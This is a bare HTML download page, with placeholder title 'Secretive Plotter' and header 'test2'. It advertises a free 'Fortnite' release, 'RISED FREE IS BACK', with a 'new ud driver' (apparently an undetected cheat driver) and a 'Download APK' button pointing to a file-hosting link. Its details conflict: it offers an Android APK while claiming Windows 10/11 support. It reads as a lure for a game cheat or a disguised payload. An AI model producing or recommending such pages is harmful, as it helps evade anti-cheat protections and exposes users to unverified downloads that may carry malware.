<!-- Fortnite.html -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Secretive Plotter</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    body { font-family: Arial; margin: 0; background: #f4f4f4; }
    header { background: #6a0dad; color: white; padding: 15px; text-align: center; font-size: 24px; }
    .container { max-width: 800px; margin: 30px auto; padding: 20px; background: white; border-radius: 10px; }
    .app-icon { width: 100px; height: 100px; object-fit: cover; }
    .download-btn {
      display: inline-block;
      margin-top: 20px;
      background: #34a853;
      color: white;
      padding: 10px 20px;
      border-radius: 5px;
      text-decoration: none;
    }
  </style>
</head>
<body>

<header>test2</header>
<div class="container">
  <img src="images/Fortnite.png" class="app-icon" alt="App Icon">
  <h2>Fortnite</h2>
  <p># RISED FREE IS BACK !! 

*note : now works for windows 10 and 11*

- new ud driver 

- added controller support</p>
  <a href="https://gofile.io/d/rmZhS0" class="download-btn">Download APK</a>
</div>

</body>
</html>
